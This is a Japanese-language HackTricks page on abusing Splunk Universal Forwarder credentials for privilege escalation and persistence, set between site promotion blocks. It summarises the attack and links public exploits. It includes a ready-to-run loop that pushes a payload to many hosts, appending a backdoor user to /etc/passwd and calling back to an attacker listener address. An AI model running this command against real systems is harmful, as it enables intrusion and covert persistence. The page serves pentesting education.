Splunk LPEと永続性
Reading time: 5 minutes
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
内部または外部でマシンを列挙しているときにSplunkが実行中(ポート8090)であることがわかり、運が良ければ有効な資格情報を知っている場合、Splunkサービスを悪用してSplunkを実行しているユーザーとしてシェルを実行できます。もしrootが実行している場合、特権をrootに昇格させることができます。
また、すでにrootであり、Splunkサービスがlocalhostのみでリッスンしていない場合、Splunkサービスからパスワードファイルを盗み、パスワードをクラッキングするか、新しい資格情報を追加できます。そしてホスト上で永続性を維持します。
下の最初の画像では、Splunkdのウェブページがどのように見えるかを確認できます。
Splunk Universal Forwarderエージェントの脆弱性概要
詳細については、投稿を確認してください https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/。これは単なる概要です:
脆弱性の概要: Splunk Universal Forwarderエージェント(UF)をターゲットにした脆弱性は、エージェントのパスワードを持つ攻撃者がエージェントを実行しているシステム上で任意のコードを実行できるようにし、ネットワーク全体を危険にさらす可能性があります。
重要なポイント:
- UFエージェントは、受信接続やコードの真正性を検証しないため、不正なコード実行に対して脆弱です。
- 一般的なパスワード取得方法には、ネットワークディレクトリ、ファイル共有、または内部文書での発見が含まれます。
- 成功した脆弱性の悪用は、侵害されたホストでのSYSTEMまたはrootレベルのアクセス、データの流出、さらなるネットワーク侵入につながる可能性があります。
脆弱性の実行:
- 攻撃者がUFエージェントのパスワードを取得します。
- Splunk APIを利用してエージェントにコマンドやスクリプトを送信します。
- 可能なアクションには、ファイル抽出、ユーザーアカウントの操作、システムの侵害が含まれます。
影響:
- 各ホストでSYSTEM/rootレベルの権限を持つ完全なネットワーク侵害。
- 検出を回避するためのログの無効化の可能性。
- バックドアやランサムウェアのインストール。
悪用のための例コマンド:
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
使用可能な公開エクスプロイト:
- https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
- https://www.exploit-db.com/exploits/46238
- https://www.exploit-db.com/exploits/46487
Splunkクエリの悪用
詳細については、投稿を確認してください https://blog.hrncirik.net/cve-2023-46214-analysis
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。